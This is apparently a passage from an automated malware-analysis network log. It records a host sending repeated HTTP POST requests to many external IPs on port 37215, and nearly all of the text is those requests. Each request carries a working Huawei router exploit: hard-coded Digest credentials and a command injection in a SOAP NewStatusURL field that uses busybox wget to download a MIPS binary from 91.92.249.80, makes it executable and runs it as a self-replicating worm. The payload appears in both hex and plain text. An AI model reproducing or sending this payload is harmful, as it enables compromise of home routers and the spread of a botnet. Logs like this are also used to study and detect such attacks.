                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2337192.168.2.2360132197.53.68.6037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.675367117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2338192.168.2.234622041.196.114.11637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.675403118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2339192.168.2.2349246157.171.79.16437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.675409079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2340192.168.2.2348782197.115.207.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.679564953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2341192.168.2.234902841.71.27.8637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.679585934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2342192.168.2.235561041.169.232.6837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.679688931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2343192.168.2.2358478197.196.41.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.679754972 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2344192.168.2.2348708197.95.76.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.679893017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2345192.168.2.235886241.29.35.10537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680116892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2346192.168.2.2333120157.133.103.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680140972 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
